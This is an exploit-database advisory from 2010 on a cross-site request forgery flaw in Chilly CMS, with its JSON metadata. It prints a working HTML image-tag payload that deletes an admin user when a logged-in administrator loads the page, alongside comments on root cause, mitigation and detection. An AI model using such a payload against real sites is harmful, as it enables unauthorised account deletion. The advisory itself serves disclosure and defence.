ID 1337DAY-ID-9671 Type zdt Reporter Pratul Agrawal Modified 2010-03-16T00:00:00
Description
Exploit for unknown platform in category web applications
=============================
Chilly CMS CSRF Vulnerability
=============================
# Vulnerability found in- Admin module
# email [email protected]
# company aksitservices
# Credit by Pratul Agrawal
# Software chilly_CMS
# Category CMS / Portals
# Site p4ge http://www.opensourcecms.com/demo/2/292/chillyCMS/admin/usergroups.site.php
# Platform php
# Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)
# Proof of concept #
Targeted URL: http://www.opensourcecms.com/demo/2/292/chillyCMS
Script to delete the admin user through cross-site request forgery (CSRF)
. ................................................................................................................
<!--
  CSRF proof of concept as published in the advisory. The <img> tag makes the
  visitor's browser issue a GET request to the admin script with
  action=deleteuser. If the browser attaches an existing admin session cookie
  to that cross-site request, the server cannot tell it apart from a request
  the administrator made on purpose.

  Root cause (as reported, not verified here): a state-changing action is
  reachable through a plain GET and is not bound to an anti-CSRF token.

  Mitigation for the application: accept deletions only through POST, require
  and verify an unpredictable per-session token on every state-changing
  request, set the SameSite attribute on the session cookie, and validate the
  Origin or Referer header as defense in depth.

  Detection: review web server logs for GET requests to the admin script that
  carry action=deleteuser with a missing or off-site Referer.

  NOTE(review): the script name and host used below (usersgroups.site.php on
  demo.opensourcecms.com) differ from the "Site p4ge" header line of this
  advisory (usergroups.site.php on www.opensourcecms.com); the advisory does
  not say which one is correct.
  [user ID] is a literal placeholder in the advisory, not a real value.
-->
<html>
<body>
<img src=http://demo.opensourcecms.com/chillycms/admin/usersgroups.site.php?action=deleteuser&id=[user ID] />
</body>
</html>
. ..................................................................................................................
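After execution, refresh the page and you can see that the added content has been deleted automatically. This only happens when the page is opened in a browser that is already logged in to the admin panel, because the forged request relies on the existing session cookie being sent with it.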
# 0day.today [2018-03-28] #
{"published": "2010-03-16T00:00:00", "id": "1337DAY-ID-9671", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2018-03-28T05:18:01", "rev": 2}, "dependencies": {"references": [], "modified": "2018-03-28T05:18:01", "rev": 2}, "vulnersScore": -0.1}, "type": "zdt", "lastseen": "2018-03-28T05:18:01", "edition": 2, "title": "Chilly CMS CSRF Vulnerability", "href": "https://0day.today/exploit/description/9671", "modified": "2010-03-16T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/9671", "references": [], "reporter": "Pratul Agrawal", "sourceData": "=============================\r\nChilly CMS CSRF Vulnerability\r\n=============================\r\n\r\n # Vulnerability found in- Admin module\r\n \r\n # email [email\u00a0protected]\r\n \r\n # company aksitservices\r\n \r\n # Credit by Pratul Agrawal\r\n \r\n # Software chilly_CMS\r\n\r\n # Category \t CMS / Portals\r\n \r\n # Site p4ge http://www.opensourcecms.com/demo/2/292/chillyCMS/admin/usergroups.site.php\r\n \r\n # Plateform php\r\n\r\n # Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)\r\n \r\n \r\n \r\n # Proof of concept #\r\n \r\n Targeted URL: http://www.opensourcecms.com/demo/2/292/chillyCMS\r\n \r\n \r\n Script to Delete the Admin user through Cross Site request forgery\r\n \r\n . ................................................................................................................\r\n \r\n <html>\r\n \r\n <body>\r\n \r\n <img src=http://demo.opensourcecms.com/chillycms/admin/usersgroups.site.php?action=deleteuser&id=[user ID] />\r\n \r\n </body>\r\n \r\n </html>\r\n \r\n . 
..................................................................................................................\r\n \r\n \r\n \r\n After execution refresh the page and u can see that a added content is deleted automatically.\r\n\r\n\r\n\r\n\n# 0day.today [2018-03-28] #"}